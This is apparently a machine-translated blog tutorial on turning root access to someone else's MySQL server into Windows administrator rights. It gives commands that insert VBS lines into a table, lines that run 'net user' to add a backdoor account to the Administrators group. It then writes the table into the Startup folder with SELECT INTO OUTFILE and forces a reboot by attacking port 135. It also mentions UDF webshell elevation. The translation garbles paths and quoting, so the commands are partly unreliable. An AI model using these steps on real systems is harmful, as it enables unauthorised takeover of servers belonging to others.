Root User Privilege Escalation: mysql write startup Item Privilege Escalation

From: Pesticide blog

In practice, you can use udf in webshell. dll elevation, use the function's file upload function to upload files to the startup directory, and then use the shut function to restart the system. (I have not succeeded yet. I have the opportunity to test it locally. I recorded it here first ). for an English version system, the Startup directory is in "C: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup"

1. Connect to the MYSQL server of the other party
Mysql-u root-h 192.168.0.1
Mysql.exe this program is in the BIN directory where you have installed MYSQL
2. Let's take a look at some databases on the server.
Mysql> show databases;
By default, MYSQL and TEST Databases are installed. If you see other databases, they are user-created databases.
3. Let's enter the database
Mysql> use test;
We will enter the test database.
4. Check the data tables in the database.
Mysql> show tables;
By default, no table exists in test.
The following are key parts:
5. Create a new table under the TEST database;
Mysql> create table a (cmd text );
Now, we have created a new table named a, which stores only one field, the field name is cmd, and the text is text.
6. insert content into the table
Mysql> insert into a values ("set wshshell = createobject (" "wscript. shell "")");
Mysql> insert into a values ("a = wshshell. run (" "cmd.exe/c net user qwer! @ # $1234/add "", 0 )");
Mysql> insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup Administrators qwer/add" ", 0 )");
Note that double quotation marks, Parentheses, and "0" must be entered! We will use these three commands to create a VBS script program!
7. Now let's look at what table a has.
Mysql> select * from;
We will see three rows of data in the table, that is, the content we just entered. After confirming that the content you entered is correct, we will proceed to the next step.
8. The output table is a VBS script file.
Mysql> select * from a into outfile "c: \ release E ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start \ a. vbs "; we input the content in our table into the Startup Group, which is a VBS script file! Note the "\" symbol.
9. You will surely know that you can use MYSQL to output an executable file. Why not use BAT, because there will be an obvious DOS window at startup, and the VBS script can completely hide the window without any error prompt! The script should have been deleted automatically after the script is completed, but the Chinese directory cannot be processed! Okay. Find a tool attack 135 and restart the server. In a few minutes, you will be the administrator.
The test is successful.